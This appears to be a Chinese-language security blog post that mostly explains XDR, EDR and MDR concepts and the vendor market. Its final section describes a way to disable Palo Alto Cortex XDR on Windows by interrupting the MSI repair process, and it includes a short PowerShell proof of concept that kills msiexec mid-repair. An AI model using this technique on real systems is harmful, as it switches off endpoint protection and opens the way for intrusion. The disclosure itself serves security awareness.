什么是XDR?
XDR(扩展检测和响应)是对复杂威胁和有针对性的攻击的高级检测和响应。此类解决方案基于一个供应商的产品,也就是说,它在更大程度上是一个单一供应商的故事。
EDR(端点检测和响应)是XDR 的关键要素。没有 EDR,就不可能有 XDR。
XDR应建立在强大的 EDR 之上,EDR 本身应覆盖端点内的大量数据源:PC、笔记本电脑、虚拟机、移动设备以及各种操作系统(Windows、Linux、MacOS、Android、iOS 等)。)。
XDR与 EDR 不同。XDR 基于 EDR 技术的扩展。
缩写名称“XDR”开头的“X”是指参与检测、调查和响应过程的连接源/产品的数量。连接的“X”的数量取决于客户的需求、某个供应商已实施的解决方案以及所选的 XDR 供应商,即其支持的来源(产品类别)。
XDR更多的是一个代表跨产品故事的概念,其之上还有其他有意义的事件响应功能。这是一个使用最大可能的自动化进行数据收集、标准化、分析、关联、高级调查和响应的单一中心。它还包括单个数据库、单个控制台、基础设施中发生的情况的单个可见性、用于根本原因分析和主动威胁搜寻的单个工具包、用于确定事件优先级的单个改进流程、与威胁情报的一个交互点, ETC。
XDR涉及不断提供更新、新规则、手册等。它不仅仅是一个装运的盒子——它是一个活生生的、不断成长的有机体,随着威胁形势的每一次变化而更新。
XDR 的概念和名称本身并不是分析师发明的,而是市场和供应商强加的。首先,XDR 是来自一家制造商的解决方案组合的逻辑整合,该解决方案组合多年来不断发展(通过收购开发和/或补充),并且其要素首先是正确的,可以从单点,有一个单一的数据交换环境,其次,如果能够通过跨产品的场景来加强它就好了。对于买方来说,这看起来像是在从一个供应商处购买多个安全解决方案时获得了额外且重要的功能,而对于制造商来说,这看起来像是从其产品组合中额外销售解决方案的更简单的选择。
EPP+EDR、网关(邮件和 Web)、NTA/NTDR、CASB、IDM 等安全工具(取决于特定供应商),以及保护行业特定系统(ATM、自动化流程)的解决方案控制系统、物联网等)充当XDR的传感器,以及可以执行响应操作的元素。
最小XDR集是端点和网络、电子邮件和 Web 流量的覆盖范围,即应首先控制的攻击者最常见和最重要的渗透点。当然,这个工具包应该包含最新的威胁数据——威胁情报。
尽管最初建立了单一供应商的历史,但XDR并不排除与第三方供应商的交互、处理来自他们的数据,以及包含与响应更相关的基本 SOAR 功能。在其产品组合中拥有 SIEM 的供应商将因快速将第三方解决方案连接到整体 XDR 概念而获得额外奖励。
XDR主要是一个云故事,但 XDR 本地部署也可以作为一个选项。这与俄罗斯相关,但并非市场上所有供应商都能提供此服务。如果供应商过去和现在都使用本地解决方案,那么它将支持本地 XDR 的历史,并且(这是合乎逻辑的)也将转向云。
XDR概念可能是 MSSP 提供商提供的服务(例如提供的 MDR 服务)的基础。
XDR和 MDR 是一个很好的互补,主要适用于拥有自己内置信息安全系统的大型组织。我们知道,对于没有信息安全人员的小型组织来说,MDR 服务是一个通过全天候服务快速提高保护级别的机会。对于大公司来说,这更多的是为了释放内部资源来执行更重要的任务,关于复杂、高质量的威胁搜寻(主动搜索威胁)以及关于建议(包括响应)。大公司很少将其基础设施中的响应问题外包给第三方团队。正是对于此类组织来说,在内置 XDR 之上提供 MDR 服务将是理想的选择,并且真正具有巨大的效益。
Palo Alto 的Cortex XDR通常在Windows系统上作为msi安装。通过触发repari 修复功能(非管理员用户也可以),我们可以启动以NT-SYSTEM身份运行的修复进程。
在修复过程中,XDR会被临时禁用大约60s,因为修复需要替换一些本来会使用的文件。
所以在这个时间间隙里,攻击者可以为所欲为。
不过60s的时间实在是不够持久,作为真男人,我们还想更猛更坚挺,那怎么延时呢?
答案是如果在修复功能期间因杀死msiexec进程而中断,那么即使在重新启动之后,Cortex XDR也将保持禁用状态,直到修复功能再次被触发
概念验证:
注意,这仅在未开启篡改保护时有效
$installed = Get-WmiObject Win32_Product$string= $installed | select-string -pattern "Cortex"$string[0] -match '{\w{8}-\w{4}-\w{4}-\w{4}-\w{12}}'Start-Process -FilePath "msiexec.exe" -ArgumentList "/fa $($matches[0])"taskkill /F /IM msiexec.exeStart-Sleep 2taskkill /F /IM msiexec.exe
信 安 考 证
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
